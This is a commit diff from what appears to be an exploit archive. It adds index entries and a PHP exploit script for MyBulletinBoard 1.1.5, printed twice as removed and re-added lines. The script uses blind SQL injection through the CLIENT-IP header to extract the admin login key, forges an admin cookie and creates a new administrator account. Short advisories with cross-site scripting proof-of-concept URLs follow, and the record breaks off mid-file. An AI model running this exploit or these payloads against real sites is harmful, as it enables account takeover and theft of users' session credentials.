DB: 2015-03-26
11 new exploits
This commit is contained in:
parent
8f1f948d2a
commit
3ab5d7365a
13 changed files with 625 additions and 327 deletions
13
files.csv
13
files.csv
|
@ -1717,7 +1717,7 @@ id,file,description,date,author,platform,type,port
|
|||
2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0
|
||||
2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
|
||||
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
|
||||
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
|
||||
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
|
||||
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
|
||||
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
|
@ -32898,3 +32898,14 @@ id,file,description,date,author,platform,type,port
|
|||
36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
|
||||
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
|
||||
36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
|
||||
36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0
|
||||
36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
|
||||
36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0
|
||||
36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0
|
||||
36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0
|
||||
36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
|
||||
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
|
||||
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
|
||||
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
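Review bot: The 36488 entry added in the second hunk gives the plugin version as `1.4.2 3`, but the advisory it indexes (platforms/php/webapps/36488.txt, added in this same commit) states `WHOIS 1.4.2.3 is vulnerable`, so the description should read `"WordPress WHOIS Plugin 1.4.2.3 'domain' Parameter Cross Site Scripting Vulnerability"`. The 36484 entry in the same hunk is dated 2011-01-01 while the entries around it, which cite consecutive SecurityFocus BIDs (51216 through 51254) and in one case the same author, are dated 2012-01-01 to 2012-01-04, so that year looks like a typo worth checking against the source before the index is published. Both are index-only corrections; the advisory text files themselves need no change.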
|
||||
|
|
|
|
@ -1,326 +1,326 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
echo "site: http://retrogod.altervista.org\n";
|
||||
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
|
||||
/*
|
||||
works regardless of php.ini settings
|
||||
*/
|
||||
if ($argc<3) {
|
||||
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
|
||||
echo "host: target server (ip/hostname)\n";
|
||||
echo "path: path to MyBB\n";
|
||||
echo "Options:\n";
|
||||
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
|
||||
echo " -u[number] specify a user id other than 1 (usually admin)\n";
|
||||
echo " -p[port]: specify a port other than 80\n";
|
||||
echo " -P[ip:port]: specify a proxy\n";
|
||||
echo " -d: disclose table prefix (reccomended)\n";
|
||||
echo "Example:\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
|
||||
die;
|
||||
}
|
||||
/* software site: http://www.mybboard.com/
|
||||
|
||||
vulnerable code in inc/functions.php near lines 1292-1320:
|
||||
|
||||
...
|
||||
function getip() {
|
||||
global $_SERVER;
|
||||
if($_SERVER['HTTP_X_FORWARDED_FOR'])
|
||||
{
|
||||
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
|
||||
{
|
||||
while(list($key, $val) = each($addresses[0]))
|
||||
{
|
||||
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
|
||||
{
|
||||
$ip = $val;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if(!$ip)
|
||||
{
|
||||
if($_SERVER['HTTP_CLIENT_IP'])
|
||||
{
|
||||
$ip = $_SERVER['HTTP_CLIENT_IP'];
|
||||
}
|
||||
else
|
||||
{
|
||||
$ip = $_SERVER['REMOTE_ADDR'];
|
||||
}
|
||||
}
|
||||
return $ip;
|
||||
}
|
||||
...
|
||||
|
||||
you can spoof your ip address through the CLIENT-IP http header...
|
||||
as result you can inject sql statements in class_session.php at lines 36-68:
|
||||
by calling the main index.php script
|
||||
...
|
||||
function init()
|
||||
{
|
||||
global $ipaddress, $db, $mybb, $noonline;
|
||||
//
|
||||
// Get our visitors IP
|
||||
//
|
||||
$this->ipaddress = $ipaddress = getip();
|
||||
|
||||
//
|
||||
// User-agent
|
||||
//
|
||||
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
|
||||
if(strlen($this->useragent) > 100)
|
||||
{
|
||||
$this->useragent = substr($this->useragent, 0, 100);
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to find a session id in the cookies
|
||||
//
|
||||
if($_COOKIE['sid'])
|
||||
{
|
||||
$this->sid = addslashes($_COOKIE['sid']);
|
||||
}
|
||||
else
|
||||
{
|
||||
$this->sid = 0;
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to load the session from the database
|
||||
//
|
||||
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
|
||||
...
|
||||
|
||||
injection is blind, but you can ask true-false questions to the database to
|
||||
retrieve the admin loginkey.
|
||||
Through that you can build an admin cookie and create a new admin user through
|
||||
the admin/users.php script.
|
||||
Also you can disclose table prefix.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
|
||||
-*****************************************************************************-
|
||||
* *
|
||||
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto *
|
||||
* grazie Grosso! *
|
||||
* *
|
||||
-*****************************************************************************-
|
||||
*/
|
||||
|
||||
error_reporting(0);
|
||||
ini_set("max_execution_time",0);
|
||||
ini_set("default_socket_timeout",5);
|
||||
|
||||
function quick_dump($string)
|
||||
{
|
||||
$result='';$exa='';$cont=0;
|
||||
for ($i=0; $i<=strlen($string)-1; $i++)
|
||||
{
|
||||
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
||||
{$result.=" .";}
|
||||
else
|
||||
{$result.=" ".$string[$i];}
|
||||
if (strlen(dechex(ord($string[$i])))==2)
|
||||
{$exa.=" ".dechex(ord($string[$i]));}
|
||||
else
|
||||
{$exa.=" 0".dechex(ord($string[$i]));}
|
||||
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
||||
}
|
||||
return $exa."\r\n".$result;
|
||||
}
|
||||
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
||||
function sendpacketii($packet)
|
||||
{
|
||||
global $proxy, $host, $port, $html, $proxy_regex;
|
||||
if ($proxy=='') {
|
||||
$ock=fsockopen(gethostbyname($host),$port);
|
||||
if (!$ock) {
|
||||
echo 'No response from '.$host.':'.$port; die;
|
||||
}
|
||||
}
|
||||
else {
|
||||
$c = preg_match($proxy_regex,$proxy);
|
||||
if (!$c) {
|
||||
echo 'Not a valid proxy...';die;
|
||||
}
|
||||
$parts=explode(':',$proxy);
|
||||
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
||||
$ock=fsockopen($parts[0],$parts[1]);
|
||||
if (!$ock) {
|
||||
echo 'No response from proxy...';die;
|
||||
}
|
||||
}
|
||||
fputs($ock,$packet);
|
||||
if ($proxy=='') {
|
||||
$html='';
|
||||
while (!feof($ock)) {
|
||||
$html.=fgets($ock);
|
||||
}
|
||||
}
|
||||
else {
|
||||
$html='';
|
||||
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
||||
$html.=fread($ock,1);
|
||||
}
|
||||
}
|
||||
fclose($ock);
|
||||
#debug
|
||||
#echo "\r\n".$html;
|
||||
}
|
||||
|
||||
function make_seed()
|
||||
{
|
||||
list($usec, $sec) = explode(' ', microtime());
|
||||
return (float) $sec + ((float) $usec * 100000);
|
||||
}
|
||||
srand(make_seed());
|
||||
$anumber = rand(1,99999);
|
||||
|
||||
$host=$argv[1];
|
||||
$path=$argv[2];
|
||||
$port=80;
|
||||
$prefix="mybb_";
|
||||
$user_id="1";//admin
|
||||
$proxy="";
|
||||
$dt=0;
|
||||
for ($i=3; $i<$argc; $i++){
|
||||
$temp=$argv[$i][0].$argv[$i][1];
|
||||
if ($temp=="-p")
|
||||
{
|
||||
$port=str_replace("-p","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-P")
|
||||
{
|
||||
$proxy=str_replace("-P","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-T")
|
||||
{
|
||||
$prefix=str_replace("-T","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-u")
|
||||
{
|
||||
$user_id=str_replace("-u","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-d")
|
||||
{
|
||||
$dt=1;
|
||||
}
|
||||
}
|
||||
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
|
||||
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
|
||||
|
||||
if ($dt)
|
||||
{
|
||||
$sql="'suntzuuuu/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("You have an error in your SQL syntax",$html))
|
||||
{
|
||||
$temp=explode("sessions",$html);
|
||||
$temp2=explode(" ",$temp[0]);
|
||||
$prefix=$temp2[count($temp2)-1];
|
||||
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "unable to disclose table prefix...\n";
|
||||
}
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
$chars[0]=0;//null
|
||||
$chars=array_merge($chars,range(48,57)); //numbers
|
||||
$chars=array_merge($chars,range(65,90));//A-Z letters
|
||||
$chars=array_merge($chars,range(97,122));//a-f letters
|
||||
$j=1;
|
||||
$loginkey="";
|
||||
while (!strstr($loginkey,chr(0)))
|
||||
{
|
||||
for ($i=0; $i<=255; $i++)
|
||||
{
|
||||
if (in_array($i,$chars))
|
||||
{
|
||||
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
|
||||
}
|
||||
if ($i==255) {die("Exploit failed...");}
|
||||
}
|
||||
$j++;
|
||||
}
|
||||
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
|
||||
echo "admin cookie -> ".$cookie."\r\n";
|
||||
|
||||
|
||||
$data='-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="action";
|
||||
|
||||
do_add
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="userusername";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="newpassword";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="email";
|
||||
|
||||
suntzoi@suntzu.org
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="usergroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="additionalgroups[]";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="displaygroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="Add User";
|
||||
|
||||
Add User
|
||||
-----------------------------7d62702f250530--
|
||||
';
|
||||
|
||||
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
|
||||
$packet.="User-Agent: Googlebot/2.1\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
|
||||
$packet.="Content-Length: ".strlen($data)."\r\n";
|
||||
$packet.="Cookie: ".$cookie."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
$packet.=$data;
|
||||
sendpacketii($packet);
|
||||
if (eregi("The user has successfully been added",$html))
|
||||
{
|
||||
echo "exploit succeeded... now login as admin\n";
|
||||
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
|
||||
}
|
||||
?>
|
||||
|
||||
# milw0rm.com [2006-07-15]
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
echo "site: http://retrogod.altervista.org\n";
|
||||
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
|
||||
/*
|
||||
works regardless of php.ini settings
|
||||
*/
|
||||
if ($argc<3) {
|
||||
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
|
||||
echo "host: target server (ip/hostname)\n";
|
||||
echo "path: path to MyBB\n";
|
||||
echo "Options:\n";
|
||||
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
|
||||
echo " -u[number] specify a user id other than 1 (usually admin)\n";
|
||||
echo " -p[port]: specify a port other than 80\n";
|
||||
echo " -P[ip:port]: specify a proxy\n";
|
||||
echo " -d: disclose table prefix (reccomended)\n";
|
||||
echo "Example:\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
|
||||
die;
|
||||
}
|
||||
/* software site: http://www.mybboard.com/
|
||||
|
||||
vulnerable code in inc/functions.php near lines 1292-1320:
|
||||
|
||||
...
|
||||
function getip() {
|
||||
global $_SERVER;
|
||||
if($_SERVER['HTTP_X_FORWARDED_FOR'])
|
||||
{
|
||||
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
|
||||
{
|
||||
while(list($key, $val) = each($addresses[0]))
|
||||
{
|
||||
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
|
||||
{
|
||||
$ip = $val;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if(!$ip)
|
||||
{
|
||||
if($_SERVER['HTTP_CLIENT_IP'])
|
||||
{
|
||||
$ip = $_SERVER['HTTP_CLIENT_IP'];
|
||||
}
|
||||
else
|
||||
{
|
||||
$ip = $_SERVER['REMOTE_ADDR'];
|
||||
}
|
||||
}
|
||||
return $ip;
|
||||
}
|
||||
...
|
||||
|
||||
you can spoof your ip address through the CLIENT-IP http header...
|
||||
as result you can inject sql statements in class_session.php at lines 36-68:
|
||||
by calling the main index.php script
|
||||
...
|
||||
function init()
|
||||
{
|
||||
global $ipaddress, $db, $mybb, $noonline;
|
||||
//
|
||||
// Get our visitors IP
|
||||
//
|
||||
$this->ipaddress = $ipaddress = getip();
|
||||
|
||||
//
|
||||
// User-agent
|
||||
//
|
||||
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
|
||||
if(strlen($this->useragent) > 100)
|
||||
{
|
||||
$this->useragent = substr($this->useragent, 0, 100);
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to find a session id in the cookies
|
||||
//
|
||||
if($_COOKIE['sid'])
|
||||
{
|
||||
$this->sid = addslashes($_COOKIE['sid']);
|
||||
}
|
||||
else
|
||||
{
|
||||
$this->sid = 0;
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to load the session from the database
|
||||
//
|
||||
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
|
||||
...
|
||||
|
||||
injection is blind, but you can ask true-false questions to the database to
|
||||
retrieve the admin loginkey.
|
||||
Through that you can build an admin cookie and create a new admin user through
|
||||
the admin/users.php script.
|
||||
Also you can disclose table prefix.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
|
||||
-*****************************************************************************-
|
||||
* *
|
||||
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto *
|
||||
* grazie Grosso! *
|
||||
* *
|
||||
-*****************************************************************************-
|
||||
*/
|
||||
|
||||
error_reporting(0);
|
||||
ini_set("max_execution_time",0);
|
||||
ini_set("default_socket_timeout",5);
|
||||
|
||||
function quick_dump($string)
|
||||
{
|
||||
$result='';$exa='';$cont=0;
|
||||
for ($i=0; $i<=strlen($string)-1; $i++)
|
||||
{
|
||||
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
||||
{$result.=" .";}
|
||||
else
|
||||
{$result.=" ".$string[$i];}
|
||||
if (strlen(dechex(ord($string[$i])))==2)
|
||||
{$exa.=" ".dechex(ord($string[$i]));}
|
||||
else
|
||||
{$exa.=" 0".dechex(ord($string[$i]));}
|
||||
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
||||
}
|
||||
return $exa."\r\n".$result;
|
||||
}
|
||||
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
||||
function sendpacketii($packet)
|
||||
{
|
||||
global $proxy, $host, $port, $html, $proxy_regex;
|
||||
if ($proxy=='') {
|
||||
$ock=fsockopen(gethostbyname($host),$port);
|
||||
if (!$ock) {
|
||||
echo 'No response from '.$host.':'.$port; die;
|
||||
}
|
||||
}
|
||||
else {
|
||||
$c = preg_match($proxy_regex,$proxy);
|
||||
if (!$c) {
|
||||
echo 'Not a valid proxy...';die;
|
||||
}
|
||||
$parts=explode(':',$proxy);
|
||||
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
||||
$ock=fsockopen($parts[0],$parts[1]);
|
||||
if (!$ock) {
|
||||
echo 'No response from proxy...';die;
|
||||
}
|
||||
}
|
||||
fputs($ock,$packet);
|
||||
if ($proxy=='') {
|
||||
$html='';
|
||||
while (!feof($ock)) {
|
||||
$html.=fgets($ock);
|
||||
}
|
||||
}
|
||||
else {
|
||||
$html='';
|
||||
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
||||
$html.=fread($ock,1);
|
||||
}
|
||||
}
|
||||
fclose($ock);
|
||||
#debug
|
||||
#echo "\r\n".$html;
|
||||
}
|
||||
|
||||
function make_seed()
|
||||
{
|
||||
list($usec, $sec) = explode(' ', microtime());
|
||||
return (float) $sec + ((float) $usec * 100000);
|
||||
}
|
||||
srand(make_seed());
|
||||
$anumber = rand(1,99999);
|
||||
|
||||
$host=$argv[1];
|
||||
$path=$argv[2];
|
||||
$port=80;
|
||||
$prefix="mybb_";
|
||||
$user_id="1";//admin
|
||||
$proxy="";
|
||||
$dt=0;
|
||||
for ($i=3; $i<$argc; $i++){
|
||||
$temp=$argv[$i][0].$argv[$i][1];
|
||||
if ($temp=="-p")
|
||||
{
|
||||
$port=str_replace("-p","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-P")
|
||||
{
|
||||
$proxy=str_replace("-P","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-T")
|
||||
{
|
||||
$prefix=str_replace("-T","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-u")
|
||||
{
|
||||
$user_id=str_replace("-u","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-d")
|
||||
{
|
||||
$dt=1;
|
||||
}
|
||||
}
|
||||
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
|
||||
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
|
||||
|
||||
if ($dt)
|
||||
{
|
||||
$sql="'suntzuuuu/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("You have an error in your SQL syntax",$html))
|
||||
{
|
||||
$temp=explode("sessions",$html);
|
||||
$temp2=explode(" ",$temp[0]);
|
||||
$prefix=$temp2[count($temp2)-1];
|
||||
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "unable to disclose table prefix...\n";
|
||||
}
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
$chars[0]=0;//null
|
||||
$chars=array_merge($chars,range(48,57)); //numbers
|
||||
$chars=array_merge($chars,range(65,90));//A-Z letters
|
||||
$chars=array_merge($chars,range(97,122));//a-f letters
|
||||
$j=1;
|
||||
$loginkey="";
|
||||
while (!strstr($loginkey,chr(0)))
|
||||
{
|
||||
for ($i=0; $i<=255; $i++)
|
||||
{
|
||||
if (in_array($i,$chars))
|
||||
{
|
||||
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
|
||||
}
|
||||
if ($i==255) {die("Exploit failed...");}
|
||||
}
|
||||
$j++;
|
||||
}
|
||||
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
|
||||
echo "admin cookie -> ".$cookie."\r\n";
|
||||
|
||||
|
||||
$data='-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="action";
|
||||
|
||||
do_add
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="userusername";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="newpassword";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="email";
|
||||
|
||||
suntzoi@suntzu.org
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="usergroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="additionalgroups[]";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="displaygroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="Add User";
|
||||
|
||||
Add User
|
||||
-----------------------------7d62702f250530--
|
||||
';
|
||||
|
||||
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
|
||||
$packet.="User-Agent: Googlebot/2.1\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
|
||||
$packet.="Content-Length: ".strlen($data)."\r\n";
|
||||
$packet.="Cookie: ".$cookie."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
$packet.=$data;
|
||||
sendpacketii($packet);
|
||||
if (eregi("The user has successfully been added",$html))
|
||||
{
|
||||
echo "exploit succeeded... now login as admin\n";
|
||||
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
|
||||
}
|
||||
?>
|
||||
|
||||
# milw0rm.com [2006-07-15]
|
||||
|
|
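--- a/platforms/php/webapps/36481.txt
+++ b/platforms/php/webapps/36481.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51216/info
+
+The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable.
+
+http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234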
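--- a/platforms/php/webapps/36482.txt
+++ b/platforms/php/webapps/36482.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51218/info
+
+Siena CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Siena CMS 1.242 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?err=[XSS]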
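--- a/platforms/php/webapps/36483.txt
+++ b/platforms/php/webapps/36483.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51220/info
+
+WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss]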
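--- a/platforms/php/webapps/36484.txt
+++ b/platforms/php/webapps/36484.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51221/info
+
+PHPB2B is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[patch]/list.php?do=search&q=[XSS]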
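--- a/platforms/php/webapps/36485.txt
+++ b/platforms/php/webapps/36485.txt
@@ -0,0 +1,9 @@
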